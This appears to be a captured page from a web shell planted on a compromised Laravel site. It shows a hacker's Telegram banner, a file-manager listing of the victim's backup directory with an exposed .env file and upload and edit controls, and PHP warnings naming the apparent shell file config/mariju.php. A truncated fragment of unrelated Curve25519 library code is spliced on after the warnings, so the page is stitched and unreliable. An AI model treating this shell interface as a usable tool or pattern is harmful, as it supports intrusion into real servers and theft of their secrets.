telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log26065562 KBJuly 19 2025 02:19:090644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
> 25; $h[0] += self::mul($carry9, 19, 5); $h[9] -= $carry9 << 25; $carry1 = ($h[1] + (1 << 24)) >> 25; $h[2] += $carry1; $h[1] -= $carry1 << 25; $carry3 = ($h[3] + (1 << 24)) >> 25; $h[4] += $carry3; $h[3] -= $carry3 << 25; $carry5 = ($h[5] + (1 << 24)) >> 25; $h[6] += $carry5; $h[5] -= $carry5 << 25; $carry7 = ($h[7] + (1 << 24)) >> 25; $h[8] += $carry7; $h[7] -= $carry7 << 25; $carry0 = ($h[0] + (1 << 25)) >> 26; $h[1] += $carry0; $h[0] -= $carry0 << 26; $carry2 = ($h[2] + (1 << 25)) >> 26; $h[3] += $carry2; $h[2] -= $carry2 << 26; $carry4 = ($h[4] + (1 << 25)) >> 26; $h[5] += $carry4; $h[4] -= $carry4 << 26; $carry6 = ($h[6] + (1 << 25)) >> 26; $h[7] += $carry6; $h[6] -= $carry6 << 26; $carry8 = ($h[8] + (1 << 25)) >> 26; $h[9] += $carry8; $h[8] -= $carry8 << 26; foreach ($h as $i => $value) { $h[$i] = (int) $value; } return ParagonIE_Sodium_Core_Curve25519_Fe::fromArray($h); } /** * @internal You should not use this directly from another application * * Inline comments preceded by # are from libsodium's ref10 code. * * @param string $n * @param string $p * @return string * @throws SodiumException * @throws TypeError */ public static function crypto_scalarmult_curve25519_ref10( #[SensitiveParameter] string $n, #[SensitiveParameter] string $p ): string { $e = $n; $e[0] = self::intToChr( self::chrToInt($e[0]) & 248 ); $e[31] = self::intToChr( (self::chrToInt($e[31]) & 127) | 64 ); $x1 = self::fe_frombytes($p); $x2 = self::fe_1(); $z2 = self::fe_0(); $x3 = clone $x1; $z3 = self::fe_1(); $swap = 0; for ($pos = 254; $pos >= 0; --$pos) { # b = e[pos / 8] >> (pos & 7); $b = self::chrToInt( $e[$pos >> 3] ) >> ($pos & 7); $b &= 1; $swap ^= $b; self::fe_cswap($x2, $x3, $swap); self::fe_cswap($z2, $z3, $swap); $swap = $b; $tmp0 = self::fe_sub($x3, $z3); $tmp1 = self::fe_sub($x2, $z2); $x2 = self::fe_add($x2, $z2); $z2 = self::fe_add($x3, $z3); $z3 = self::fe_mul($tmp0, $x2); $z2 = self::fe_mul($z2, $tmp1); $tmp0 = self::fe_sq($tmp1); $tmp1 = self::fe_sq($x2); $x3 = self::fe_add($z3, $z2); $z2 = self::fe_sub($z3, $z2); $x2 = self::fe_mul($tmp1, $tmp0); $tmp1 = self::fe_sub($tmp1, $tmp0); $z2 = self::fe_sq($z2); $z3 = self::fe_mul121666($tmp1); $x3 = self::fe_sq($x3); $tmp0 = self::fe_add($tmp0, $z3); $z3 = self::fe_mul($x1, $z2); $z2 = self::fe_mul($tmp1, $tmp0); } self::fe_cswap($x2, $x3, $swap); self::fe_cswap($z2, $z3, $swap); $z2 = self::fe_invert($z2); $x2 = self::fe_mul($x2, $z2); return self::fe_tobytes($x2); } /** * @internal You should not use this directly from another application * * @param ParagonIE_Sodium_Core_Curve25519_Fe $edwardsY * @param ParagonIE_Sodium_Core_Curve25519_Fe $edwardsZ * @return ParagonIE_Sodium_Core_Curve25519_Fe */ public static function edwards_to_montgomery( ParagonIE_Sodium_Core_Curve25519_Fe $edwardsY, ParagonIE_Sodium_Core_Curve25519_Fe $edwardsZ ): ParagonIE_Sodium_Core_Curve25519_Fe { $tempX = self::fe_add($edwardsZ, $edwardsY); $tempZ = self::fe_sub($edwardsZ, $edwardsY); $tempZ = self::fe_invert($tempZ); return self::fe_mul($tempX, $tempZ); } /** * @internal You should not use this directly from another application * * @param string $n * @return string * @throws SodiumException * @throws TypeError */ public static function crypto_scalarmult_curve25519_ref10_base( #[SensitiveParameter] string $n ): string { $e = $n; $e[0] = self::intToChr( self::chrToInt($e[0]) & 248 ); $e[31] = self::intToChr( (self::chrToInt($e[31]) & 127) | 64 ); $A = self::ge_scalarmult_base($e); $pk = self::edwards_to_montgomery($A->Y, $A->Z); return self::fe_tobytes($pk); } }